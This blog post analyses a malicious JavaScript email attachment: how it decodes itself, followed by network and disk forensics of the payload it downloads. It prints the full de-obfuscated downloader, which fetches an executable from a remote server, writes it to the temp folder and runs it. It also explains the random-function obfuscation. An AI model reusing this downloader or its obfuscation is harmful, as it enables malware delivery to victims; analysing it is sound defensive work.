There’s a theory that a thousand monkeys typing away at a thousand typewriters will eventually reproduce the works of Shakespeare. I got home one day to find a JavaScript downloader semi-randomly creating dynamic functions until one of them worked and downloaded some malware that I hadn’t seen before.
Background
We’re all used to getting emails claiming to be an unpaid invoice, and I’m often busy doing something else (or too tired after a day’s work) to worry about most of them. For some reason though, I decided to have a look at this one and I’m glad I did as it turned out to be interesting and prompted me to add some functionality to my unpacking script (I really ought to come up with a better name for that).
The emails (I ended up receiving a few of them) were sent to an ‘info@’ email address that was mentioned on a web site and ended up being delivered straight to my inbox. They contained an attachment which was a zipped JavaScript file.
The JavaScript file was obviously obfuscated, but as I set out trying to manually de-obfuscate it, I noticed that it was dynamically creating a function by interspersing randomly selected fragments of JavaScript with static strings of JavaScript. It would then call this dynamically generated function.
The Math.random() call used to dynamically piece a string of JavaScript back together before executing it had me baffled at the time, although admittedly I was trying to watch TV at the same time — a combination which wasn’t working well — so I opted to run the JavaScript using Cuckoo instead.
The first time that I ran it, it downloaded a copy of the Cerber ransomware (or at least something claiming to be Cerber). I ran it again the next day, as a demonstration, and it downloaded a different piece of malware which I haven’t yet identified, and the analysis of which prompted me to add some more functionality to my unpacking script.
Just after starting this blog post, I had one of those ‘ah ha’ moments regarding the obfuscated JavaScript file, checked it out, and managed to de-obfuscate it, so I’ll break this into two parts: the first covering the JavaScript downloader, and the second covering the binary.
The JavaScript Attachment
Firstly, the email mentioned:
Please see the file that is attached.The file is password protected to protect your information. The password is 123456
This is obviously phoney because password protecting the file and then including the password on the next line isn’t going to ‘protect your information’. Plus it’s a simple password.
The de-obfuscation part of the JavaScript file dynamically creates a function:
[code autolinks=”false”]
ghrue=(new Function("kvaoa","qwori","ksgaj","var pqorq=kvaoa.match(/\\S{5}/g),ogwnh=\"\",ogwig=0;while(ogwig<pqorq.length){ogwnh+"+ogmwn()+"ng"+ogmwn()+"ode(p"+ogmwn()+"Int(pqorq[ogwig"+ogmwn()+"11);ogwig++;}eval(ogwnh);")(ogiwj,null,null));
[/code]
and then runs it. That function that it calls looks similar to this:
[code autolinks=”false”]
function ogmwn()
{
var wjgts=new Array("-||&","].substr(3,2),16)^",".fromCharC","=Stri","arse","s{d{","d{fsgfg","<<J","_IE");
return wjgts[Math.floor(Math.random()*wjgts.length)];
}
[/code]
Now you can see why I was a tad foxed by this — how is a JavaScript function that contains four randomly selected string fragments possibly going to run?!
It turns out that I was focussing on the detail too much and missing the bigger picture. It came to me just after I started this blog post — what if it keeps generating that function until the random choices are such that the function is syntactically correct and runs? With that in mind, I went back and looked at the surrounding code:
[code autolinks=”false”]
var ienbc;
while (true) {
try {
ghrue = (new Function("kvaoa","qwori","ksgaj","var pqorq=kvaoa.match(/\\S{5}/g),ogwnh=\"\",ogwig=0;while(ogwig<pqorq.length){ogwnh+"+ogmwn()+"ng"+ogmwn()+"ode(p"+ogmwn()+"Int(pqorq[ogwig"+ogmwn()+"11);ogwig++;}eval(ogwnh);")(ogiwj,null,null));
break;
} catch(er) {
var a = 1;
}
}
return ghrue;
[/code]
and noticed that that is exactly what it is doing — it’s a simplified version of the thousand monkeys with a thousand typewriters.
If the randomly selected string fragments don’t produce a syntactically correct function, the new Function() call inside the try block throws an exception (as would a function that parses but fails when it is run) and control is transferred to the catch() block. Since the condition in the while loop is the constant ‘true’, the loop is executed again, dynamically generating another version of the function.
If, however, the randomly selected string fragments do generate a working function, it is called straight away with the obfuscated string (ogiwj) as its first argument, which is where the decoded payload gets passed to eval(). Program flow then continues to the break statement, which exits the while(true) loop, and the return statement passes back whatever the generated function returned.
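As a rough illustration of the same trick, here is a Python analogue rather than the malware’s own code. The fragment table, the static pieces and the two sample tokens are all made up for the sketch: three useful fragments are hidden among junk, and the loop keeps splicing random fragments into the template until the result both compiles and runs.

```python
import random

# Hypothetical fragment table: three useful fragments hidden among junk.
FRAGMENTS = ["hr", "5", "ns", "-||&", "s{d{", "<<J", "_IE"]

# Static pieces of the decoder; one random fragment is spliced into each gap.
PIECES = ["result = ''.join(c", "(int(t[3:", "], 16) ^ 11) for t in toke", ")"]


def build_candidate(rng):
    """Interleave the static pieces with randomly chosen fragments."""
    source = PIECES[0]
    for piece in PIECES[1:]:
        source += rng.choice(FRAGMENTS) + piece
    return source


def decode_by_trial(tokens, rng):
    """Keep generating candidates until one compiles and runs without error."""
    attempts = 0
    while True:
        attempts += 1
        scope = {"tokens": tokens}
        try:
            exec(build_candidate(rng), scope)
            return scope["result"], attempts
        except Exception:  # SyntaxError, NameError, ...: just try again
            continue


# Made-up input: the last two hex digits of each group carry the data.
text, attempts = decode_by_trial(["xyz63", "abc62"], random.Random())
print(text, "after", attempts, "attempts")
```

With seven fragments and three gaps, only one of the 343 combinations yields working code, so the loop typically needs a few hundred attempts. The downloader has nine fragments and four gaps, which makes the odds longer but the idea is the same.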
What we need to do now is determine what the correct version of the dynamically generated function is, by determining which of the string fragments from the array will syntactically fit in to the rest of the string to form the new function. This is reasonably easy because we can match ‘[‘ characters with ‘]’, and complete JavaScript function names such as fromCharCode():
[code autolinks=”false”]
var ienbc;
while (true) {
try {
ghrue = (new Function("kvaoa","qwori","ksgaj","var pqorq=kvaoa.match(/\\S{5}/g),ogwnh=\"\",ogwig=0;while(ogwig<pqorq.length){ogwnh+=String.fromCharCode(parseInt(pqorq[ogwig].substr(3,2),16)^11);ogwig++;}eval(ogwnh);")(ogiwj,null,null));
break;
} catch(er) {
var a = 1;
}
}
[/code]
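The fragment matching can also be done mechanically. The sketch below, in Python, tries every combination of the nine fragments in the four gaps and keeps only those where the brackets balance and the two expected function names appear. The bracket check is deliberately naive (it ignores string and regex literals), and the choice of `String.fromCharCode(` and `parseInt(` as the names to look for is an assumption based on the fragments themselves.

```python
from itertools import product

FRAGMENTS = ["-||&", "].substr(3,2),16)^", ".fromCharC", "=Stri", "arse",
             "s{d{", "d{fsgfg", "<<J", "_IE"]

# Static pieces of the function body, in order; one fragment goes in each gap.
PIECES = [
    ('var pqorq=kvaoa.match(/\\S{5}/g),ogwnh="",ogwig=0;'
     "while(ogwig<pqorq.length){ogwnh+"),
    "ng",
    "ode(p",
    "Int(pqorq[ogwig",
    "11);ogwig++;}eval(ogwnh);",
]

PAIRS = {")": "(", "]": "[", "}": "{"}


def brackets_balanced(source):
    """Naive check that (), [] and {} are properly nested."""
    stack = []
    for ch in source:
        if ch in "([{":
            stack.append(ch)
        elif ch in PAIRS:
            if not stack or stack.pop() != PAIRS[ch]:
                return False
    return not stack


def assemble(choice):
    """Splice one fragment into each gap between the static pieces."""
    source = PIECES[0]
    for fragment, piece in zip(choice, PIECES[1:]):
        source += fragment + piece
    return source


def plausible(source):
    return (brackets_balanced(source)
            and "String.fromCharCode(" in source
            and "parseInt(" in source)


candidates = [assemble(c) for c in product(FRAGMENTS, repeat=len(PIECES) - 1)]
survivors = [s for s in candidates if plausible(s)]
print(len(candidates), "candidates,", len(survivors), "survivor(s)")
for source in survivors:
    print(source)
```

A filter like this only narrows the field; whether a surviving candidate is real JavaScript still has to be confirmed by reading it or running it in a sandbox.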
Making the resolved function a tad more readable:
[code autolinks=”false”]
var ienbc;
while (true) {
    try {
        // Roughly equivalent to the new Function("kvaoa","qwori","ksgaj","...") call,
        // written as a function expression so that the body is valid, readable JavaScript.
        ghrue = (function (kvaoa, qwori, ksgaj) {
            var pqorq = kvaoa.match(/\S{5}/g);
            var ogwnh = "";
            var ogwig = 0;
            while (ogwig < pqorq.length) {
                ogwnh += String.fromCharCode(parseInt(pqorq[ogwig].substr(3,2),16)^11);
                ogwig++;
            }
            eval(ogwnh);
        })(ogiwj, null, null);
        break;
    } catch (er) {
        var a = 1;
    }
}
[/code]
We can now see how it is doing the de-obfuscation. The first parameter (the last two are unused) is first broken up into groups of five (‘{5}’) non-space (‘\S’) characters by the match() call, with the ‘g’ flag making it return every such group rather than just the first. These groups are stored in the array pqorq.
The while loop then iterates through each of the groups of five characters using ogwig as the index (‘ogwig < pqorq.length’). For each of these groups, it takes the two character substring starting at offset 3 (‘.substr(3,2)’), which is the last two characters of the group; the first three characters are discarded.
The two characters are then passed to parseInt(), using 16 as the radix (base) — in other words, convert a string of hex digits to an integer (‘parseInt(…,16)’). This value is then xored with 11 (‘^11’), before being converted to an ASCII character (‘String.fromCharCode(…)’) and appended to what will become the output string (‘ogwnh += …’).
Now that we have the de-obfuscation algorithm, we can script it in something like Python or, if you’re like me, sed and awk (although I just thought that if I actually do it in Python, then Windows users will stand more of a chance of being able to use it/follow along).
[code autolinks=”false”]
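#!/bin/sh
# Keep the last two characters of every group of five, then XOR-decode each hex pair.
# strtonum() and xor() are GNU awk (gawk) extensions.
sed 's/...\(..\)/\1/g' hexstr.js | awk '
{
    for (i = 1; i < length($0); i += 2) {
        byte = substr($0, i, 2);
        dec = strtonum("0x" byte);
        printf("%c", xor(dec, 11));
    }
}
'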
[/code]
I’m in two minds about that awk script, though, as it uses strtonum() and xor(). I didn’t recall those being in awk before, and the man page confirms that they are GNU extensions rather than POSIX.
I remember them not being available in earlier versions of awk that I’ve used because I had to write my own functions to convert a hexadecimal string to an integer and to xor two values together (it was before Python and I don’t like Perl). However, that was back when I had more spare time on my hands, so for the sake of time (and because I can’t remember where I put my awk xor implementation) I’ve used the GNU functions in this script.
Right, back to the present, let’s have a look at how the script works. Oh, something that I didn’t include in here, for brevity, is the string of obfuscated JavaScript which we need to feed to the above Bourne shell (sed and awk combo) script.
The obfuscated JavaScript string was constructed using eight kvaoa += “…” statements. We need to remove all the JavaScript and concatenate just the string contents all on to one line before passing it to the script — I just did that the slow, boring, manual way using vi.
The initial sed command is doing a substitution (the sed ‘s///’ command) which takes the place of the JavaScript match() and substr() combo by discarding all characters except for the last two (‘\(..\)’) in every (‘g’) group of five (‘...\(..\)’).
The ‘...’ followed by ‘\(..\)’ will match five characters in total, as ‘.’ matches any character. The escaped parentheses (‘\(\)’) tell sed to remember the contents (in this case the last two out of five characters) so that we can refer to them in the substituted text (the right hand side of the ‘s’ command) using a numbered back-reference (‘\1’ in this case, as there is only one set of parentheses on the left side of the ‘s’ command). The trailing ‘g’ says to repeat this for every match, not just the first (the same as the ‘g’ in the JavaScript match() call). If we left the ‘g’ out, only the first group of five would be reduced to its last two characters and the rest of the line would be left untouched.
The sed command will thus output one long string (because I manually put all of the obfuscated JavaScript string on to one line) consisting of the last two characters of every group of five which, according to the original JavaScript, should be valid hex characters.
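For anyone following along without sed, the same substitution can be tried with Python’s re module. This is only a small sketch on a made-up ten character sample; it also shows what happens without the ‘g’ flag, for which the nearest Python equivalent is `count=1`.

```python
import re

sample = "abc41xyz42"  # made-up input: two groups of five characters

# Equivalent of sed 's/...\(..\)/\1/g': every group of five keeps its last two.
every_group = re.sub(r"...(..)", r"\1", sample)

# Equivalent of leaving the 'g' off: only the first group is rewritten.
first_only = re.sub(r"...(..)", r"\1", sample, count=1)

print(every_group)  # 4142
print(first_only)   # 41xyz42
```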
The awk script takes the long string of hex characters from sed and processes them two at a time (‘i += 2’) by taking the next two characters (‘substr($0,i,2)’), prepending ‘0x’ (‘”0x” byte’) to signify a hexadecimal value, and passing it to strtonum() to convert it to decimal. The decimal value is then xored with 11 (‘xor(dec,11)’) before being converted to an ASCII character using the printf() function with a format string of “%c”.
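For comparison, here is a minimal Python sketch of the same decoding, which avoids the dependency on GNU awk. The `join_string_literals()` helper assumes the obfuscated data is built with statements of the form `kvaoa += "..."` with no embedded double quotes, and `encode()` exists only to manufacture test input; neither is taken from the original sample.

```python
import re


def join_string_literals(js_source, name="kvaoa"):
    """Concatenate the contents of every `name += "..."` statement."""
    pattern = re.escape(name) + r'\s*\+=\s*"([^"]*)"'
    return "".join(re.findall(pattern, js_source))


def decode(obfuscated, key=11):
    """Mirror the generated JavaScript: split into groups of five non-space
    characters, parse the last two of each as hex, and XOR with the key."""
    groups = re.findall(r"\S{5}", obfuscated)
    return "".join(chr(int(group[3:5], 16) ^ key) for group in groups)


def encode(plain, key=11, padding="zzz"):
    """Inverse of decode(), used here only to build sample input."""
    return "".join(f"{padding}{ord(ch) ^ key:02x}" for ch in plain)


sample_js = 'kvaoa += "{}";\nkvaoa += "{}";'.format(encode("var a"), encode("=1;"))
print(decode(join_string_literals(sample_js)))  # var a=1;
```

One difference from the JavaScript worth knowing about: `int(..., 16)` raises a ValueError on a group whose last two characters are not hex digits, whereas parseInt() would quietly return NaN.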
Now we get to the bit that you’ve been on the edge of your seat for — the output.
[code autolinks=”false”]
function getDataFromUrl(url, callback) {
try {
var xmlHttp = new ActiveXObject("MSXML2.XMLHTTP");
xmlHttp.open("GET", url, false);
xmlHttp.send();
if (xmlHttp.status == 200) {
return callback(xmlHttp.ResponseBody, false);
} else {
return callback(null, true);
}
} catch (error) {
return callback(null, true);
}
}
function getData(callback) {
try {
getDataFromUrl("http://ipaddr/10.mov", function(result, error) {
if (!error) {
return callback(result, false);
} else {
getDataFromUrl("http://ipaddr/10.mov", function(result, error) {
if (!error) {
return callback(result, false);
} else {
getDataFromUrl("http://ipaddr/10.mov", function(result, error) {
if (!error) {
return callback(result, false);
} else {
return callback(null, true);
}
});
}
});
}
});
} catch (error) {
return callback(null, true);
}
}
function getTempFilePath() {
try {
var fs = new ActiveXObject("Scripting.FileSystemObject");
var tmpFileName = "\\" + Math.random().toString(36).substr(2, 9) + ".exe";
var tmpFilePath = fs.GetSpecialFolder(2) + tmpFileName;
return tmpFilePath;
} catch (error) {
return false;
}
}
function saveToTemp(data, callback) {
try {
var path = getTempFilePath();
if (path) {
var objStream = new ActiveXObject("ADODB.Stream");
objStream.Open();
objStream.Type = 1;
objStream.Write(data);
objStream.Position = 0;
objStream.SaveToFile(path, 2);
objStream.Close();
return callback(path, false);
} else {
return callback(null, true);
}
} catch (error) {
return callback(null, true);
}
}
getData(function (data, error) {
if (!error) {
saveToTemp(data, function (path, error) {
if (!error) {
try {
var wsh = new ActiveXObject("WScript.Shell");
wsh.Run(path);
} catch (error) {
}
}
});
}
});
[/code]
Granted, it didn’t come out looking like that — I have added white space to make it more readable. All the text, however, is the original text — it was nice of the author(s) to use meaningful function names.
The getDataFromUrl() function simply uses an MSXML2.XMLHTTP ActiveX object to make a synchronous GET request (the third argument to open() is false) for the URL passed to the function in url. It calls the function passed to it in callback with the results of the download: the HTTP response body if the HTTP server returned the HTTP status code ‘200’, or an error flag otherwise.
getData() looks convoluted, but that is because it contains the same code nested three levels deep, presumably to retry the download three times. Why it doesn’t use a loop I don’t know (unless using a loop would break the ability to pass a function object to getDataFromUrl()). This function contains the URL from which the malicious binary is downloaded; I have removed the IP address that was in the original code, but the path (/10.mov) is the same as that in the original code.
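To show what the loop version of that retry logic might look like, here is a short Python sketch. It is not a translation of the malware: `fetch` is a hypothetical callable returning a (status, body) pair, injected so that the retry logic can be exercised without touching the network.

```python
def get_data(fetch, url, attempts=3):
    """Call fetch(url) up to `attempts` times; return (data, error_flag)."""
    for _ in range(attempts):
        try:
            status, body = fetch(url)
        except Exception:
            continue  # treat any failure like the script's catch block
        if status == 200:
            return body, False
    return None, True


# Usage with a stand-in fetcher that fails twice before succeeding.
calls = []


def flaky_fetch(url):
    calls.append(url)
    if len(calls) < 3:
        return 500, None
    return 200, b"MZ"


print(get_data(flaky_fetch, "http://ipaddr/10.mov"), len(calls))
```

The return value keeps the (data, error) shape that the JavaScript passes to its callbacks, so the two are easy to compare side by side.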
getTempFilePath() uses Math.random() to generate a random floating point number between 0 and 1 (not including 1; see the Math.random() documentation). This is then converted to a string representing the number in base 36 (10 digits plus 26 letters of the alphabet) (‘.toString(36)’), which gives something of the form ‘0.xxxxxxxxxxx’. It then takes up to 9 characters starting from the third character (‘2’, with this index being zero based), which skips the leading ‘0.’ (‘.substr(2,9)’), and appends ‘.exe’ to create a file name. The file name is appended to the path of the temporary folder returned by an ActiveX FileSystemObject object (‘GetSpecialFolder(2)’, which is the directory named by the %TMP% environment variable; see the MSDN documentation for GetSpecialFolder()) to create the full path that the downloaded file (10.mov) will be saved to.
saveToTemp() uses getTempFilePath() to generate a filespec (path + file name), then uses an ADODB.Stream ActiveX object in binary mode (‘Type = 1’) to write the data to the temporary file. The ‘2’ in the SaveToFile() call specifies adSaveCreateOverWrite, that is, that the file should be created if it doesn’t already exist, or overwritten if it does (see the documentation for the SaveOptions parameter of SaveToFile()).
So, basically, the zipped JavaScript email attachment is dynamically generating a de-obfuscation function (presumably to thwart automated static analysis) which will download the specified URL (‘/10.mov’ from an HTTP server specified by an IP address which I’ve removed). The downloaded file is saved to a .exe file with a randomly generated name saved in the directory (folder) specified by the %TMP% environment variable.
The randomly generated file name is created by converting a random fraction to base 36 and keeping up to nine of the characters that follow the leading ‘0.’ (it will usually be the full nine, but can be fewer if toString(36) produces a shorter string). This means that the randomly generated file name will be made up of lowercase letters and digits (base-36 uses the 10 digits that base-10 uses, plus the 26 letters of the alphabet, similarly to base-16 (hexadecimal) which uses the 10 digits plus the first 6 letters of the alphabet).
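The file name generation can be approximated in Python as below. This is only a sketch: JavaScript’s toString(36) picks the shortest string that round-trips to the same number, so the trailing digits of a real name may differ from what this simple multiply-by-36 loop gives, and the function names are invented for the example.

```python
import random

DIGITS = "0123456789abcdefghijklmnopqrstuvwxyz"


def fraction_to_base36(value, max_digits=9):
    """Return up to max_digits base-36 digits of a fraction 0 <= value < 1."""
    digits = []
    while value > 0 and len(digits) < max_digits:
        value *= 36
        digit = int(value)  # the integer part is the next base-36 digit
        digits.append(DIGITS[digit])
        value -= digit
    return "".join(digits)


def temp_file_name(value=None):
    """Build a name like the script's: backslash, base-36 digits, '.exe'."""
    if value is None:
        value = random.random()
    return "\\" + fraction_to_base36(value) + ".exe"


print(temp_file_name(0.5))   # \i.exe
print(temp_file_name(0.25))  # \9.exe
print(temp_file_name())      # random, e.g. nine characters plus .exe
```

The 0.5 and 0.25 cases show why the name is not always nine characters long: fractions with a short base-36 expansion produce short names.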
Recovering the Downloaded File
I then attempted to recover the downloaded file. My first attempt was to extract the file from a pcap file generated by Wireshark, as I was watching the network traffic from/to the Cuckoo virtual machine while I was running malware.
Using Wireshark and Suricata
Since I had started Wireshark capturing all packets from/to the Cuckoo virtual machine in which I was running the malware sample, I simply stopped the capture and saved all of the packets to a pcap file. I then modified Suricata‘s configuration to enable file-store:
[code autolinks=”false”]
  - file-store:
      enabled: yes       # set to yes to enable
      log-dir: files    # directory to store the files
      force-magic: no   # force logging magic on all stored files
      # force logging of checksums, available hash functions are md5,
      # sha1 and sha256
      #force-hash: [md5]
      force-filestore: yes # force storing of all files
      # override global stream-depth for sessions in which we want to
      # perform file extraction. Set to 0 for unlimited.
      #stream-depth: 0
      #waldo: file.waldo # waldo file to store the file_id across runs
[/code]
… and file-log:
[code autolinks=”false”]# output module to log files tracked in a easily parsable json format
  - file-log:
      enabled: yes
      filename: files-json.log
      append: yes
      #filetype: regular # 'regular', 'unix_stream' or 'unix_dgram'
      force-magic: no   # force logging magic on all logged files
      # force logging of checksums, available hash functions are md5,
      # sha1 and sha256
      #force-hash: [md5]
[/code]
I then ran Suricata. To do this, I made a subdirectory, changed into it, then ran the following Suricata command:
[code autolinks=”false”]suricata -c /etc/suricata/suricata.yaml -l . -r ../unknown.pcap
[/code]
The -l option sets the default log directory, and I used this to override the /var/log/suricata/ log directory in the configuration file. This means that I can still run Suricata as a non-root user (just in case), without having to change the log directory in the configuration file and then change it back again, nor copy the configuration and change it.
The -r option specifies the pcap file to read from. The -c option specifies the configuration file to use.
We can then look for anything downloaded from /10.mov with the following command, in the Suricata log directory (which we set to ‘.’ with the -l option):
[code autolinks=”false”]
$ grep "10\.mov" *
eve.json:{"timestamp":"2017-01-05T18:44:14.746418+1100","flow_id":413914475649496,"pcap_cnt":75,"event_type":"alert","src_ip":"86.106.131.141","src_port":80,"dest_ip":"10.254.241.43","dest_port":1063,"proto":"TCP","tx_id":0,"alert":{"action":"allowed","gid":1,"signature_id":2018959,"rev":2,"signature":"ET POLICY PE EXE or DLL Windows file download HTTP","category":"Potential Corporate Privacy Violation","severity":1},"http":{"hostname":"86.106.131.141","url":"\/10.mov","http_user_agent":"Mozilla\/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET4.0C; .NET4.0E)","http_content_type":"video\/quicktime","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":42333}}
eve.json:{"timestamp":"2017-01-05T18:44:15.434448+1100","flow_id":413914475649496,"pcap_cnt":147,"event_type":"http","src_ip":"10.254.241.43","src_port":1063,"dest_ip":"86.106.131.141","dest_port":80,"proto":"TCP","tx_id":0,"http":{"hostname":"86.106.131.141","url":"\/10.mov","http_user_agent":"Mozilla\/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET4.0C; .NET4.0E)","http_content_type":"video\/quicktime","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":103393}}
eve.json:{"timestamp":"2017-01-05T18:44:15.468951+1100","flow_id":413914475649496,"pcap_cnt":149,"event_type":"fileinfo","src_ip":"86.106.131.141","src_port":80,"dest_ip":"10.254.241.43","dest_port":1063,"proto":"TCP","http":{"hostname":"86.106.131.141","url":"\/10.mov","http_user_agent":"Mozilla\/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET4.0C; .NET4.0E)","http_content_type":"video\/quicktime","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":106233},"app_proto":"http","fileinfo":{"filename":"\/10.mov","state":"TRUNCATED","stored":false,"size":2573,"tx_id":0}}
grep: files: Is a directory
files-json.log:{ "timestamp": "01\/05\/2017-18:44:15.468951", "pcap_pkt_num": 149, "ipver": 4, "srcip": "86.106.131.141", "dstip": "10.254.241.43", "protocol": 6, "sp": 80, "dp": 1063, "http_uri": "\/10.mov", "http_host": "86.106.131.141", "http_referer": "<unknown>", "http_user_agent": "Mozilla\/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET4.0C; .NET4.0E)", "filename": "\/10.mov", "magic": "unknown", "state": "TRUNCATED", "stored": false, "size": 2573 }
[/code]
From this we can see that the file has been truncated (“state”: “TRUNCATED”) — we’ll need to come up with a different way of capturing the binary file.
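Rather than reading the grep output by eye, the fileinfo records can be picked out of eve.json with a few lines of Python. This is a sketch that relies only on the field names visible in the log lines above; the sample record is a cut-down copy of the fileinfo event, and reading the real log would simply mean passing the open file instead of a list.

```python
import json


def file_events(lines, url):
    """Yield (state, stored, size) for each fileinfo event matching url."""
    for line in lines:
        try:
            event = json.loads(line)
        except ValueError:
            continue  # skip anything that is not a JSON record
        if not isinstance(event, dict) or event.get("event_type") != "fileinfo":
            continue
        if event.get("http", {}).get("url") != url:
            continue
        info = event.get("fileinfo", {})
        yield info.get("state"), info.get("stored"), info.get("size")


# Cut-down copy of the fileinfo record shown in the grep output.
SAMPLE_LINE = (r'{"event_type":"fileinfo","http":{"url":"\/10.mov"},'
               r'"fileinfo":{"filename":"\/10.mov","state":"TRUNCATED",'
               r'"stored":false,"size":2573}}')

for state, stored, size in file_events([SAMPLE_LINE], "/10.mov"):
    print(state, stored, size)  # TRUNCATED False 2573
```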
The Forensics Approach
Another approach that we can try is to boot the virtual machine using a live Linux CDROM/DVD image, like Kali, mount the NTFS filesystem, and try to identify recently modified files. We know, from looking at the de-obfuscated JavaScript file and from looking at the pcap file, that the JavaScript requested /10.mov from an HTTP server. We also know, from looking at the response from the server, that although the file ends in .mov, and the returned Content-type: header was video/quicktime, the returned file was actually a Windows PE (portable executable) file because the returned content started with the characters MZ.
Knowing that the downloaded file was a Windows PE file, we can use the UNIX find command to look for recently modified files that are Windows PE files. This command assumes that you are running it less than 24 hours after the malware was downloaded; modify the ‘-1’ argument to the -mtime predicate if you need to go back further (the ‘-’ says less than, and the number represents multiples of 24 hours, so ‘-mtime -1’ will match files whose mtime (last modified time) is less than 1 * 24 hours ago):
[code autolinks=”false”]
$ find . -type f -mtime -1 -exec file {} \; | grep "PE32"
./Documents and Settings/user/Application Data/itunes.exe: PE32 executable (GUI) Intel 80386, for MS Windows
./Documents and Settings/user/Local Settings/Temporary Internet Files/Content.IE5/H8T9VMND/10[1].mov: PE32 executable (GUI) Intel 80386, for MS Windows
[/code]
Neither of those results is a randomly named .exe in the temporary directory, so it looks like the malware deleted itself (the temporary file that the de-obfuscated JavaScript downloaded 10.mov to). We could use fls from Sleuthkit to look for deleted files:
[code autolinks=”false”]
fls -dFlr /dev/sda1 |grep "\.exe"
[/code]
- -d to only show deleted files
- -F to only show files (not directories)
- -l to use long listing format (similar to ‘ls -l’)
- -r to recurse in to directories
However, the find command showed 10.mov still sitting in the Internet Explorer cache (Temporary Internet Files/Content.IE5/) so we can just pull it from there. Let’s compare the hashes of 10.mov and itunes.exe to see if those files are actually the same, given that this is a Cuckoo virtual machine so there was very little activity except that generated by us running the malware (I certainly didn’t install iTunes):
[code autolinks=”false”]
$ md5sum -b Documents\ and\ Settings/user/Application\ Data/itunes.exe Documents\ and\ Settings/user/Local\ Settings/Temporary\ Internet\ Files/Content.IE5/H8T9VMND/10\[1\].mov
54bfe37e0c2b05f674a71c0859aa1974 *Documents and Settings/user/Application Data/itunes.exe
54bfe37e0c2b05f674a71c0859aa1974 *Documents and Settings/user/Local Settings/Temporary Internet Files/Content.IE5/H8T9VMND/10[1].mov
[/code]
It looks like those two files are the same file, suggesting that the malware which was downloaded and executed by the de-obfuscated JavaScript saved a copy of itself to %APPDATA%\itunes.exe.
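The find, file and md5sum steps can be rolled into one Python sketch for anyone without those tools to hand. Note that it only checks for the two byte ‘MZ’ signature, which is a weaker test than the PE32 identification that file performs, and the function names are invented for the example.

```python
import hashlib
import os
import time
from collections import defaultdict


def recent_pe_files(root, max_age_hours=24):
    """Yield paths under root modified within max_age_hours that start with 'MZ'."""
    cutoff = time.time() - max_age_hours * 3600
    for folder, _dirs, names in os.walk(root):
        for name in names:
            path = os.path.join(folder, name)
            try:
                if os.path.getmtime(path) < cutoff:
                    continue
                with open(path, "rb") as handle:
                    if handle.read(2) == b"MZ":
                        yield path
            except OSError:
                continue  # unreadable or vanished file


def group_by_md5(paths):
    """Map each MD5 digest to the list of paths whose contents have that digest."""
    groups = defaultdict(list)
    for path in paths:
        with open(path, "rb") as handle:
            groups[hashlib.md5(handle.read()).hexdigest()].append(path)
    return dict(groups)
```

Calling `group_by_md5(recent_pe_files(mount_point))`, where `mount_point` is wherever the NTFS filesystem was mounted, gives a dictionary in which any digest with more than one path flags identical copies, as with itunes.exe and 10[1].mov here.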
In part two I shall look at the downloaded binary file, which unpacks itself, runs anti-debugging checks (which I need to make my unpacking script survive), and appears to do something with Tor.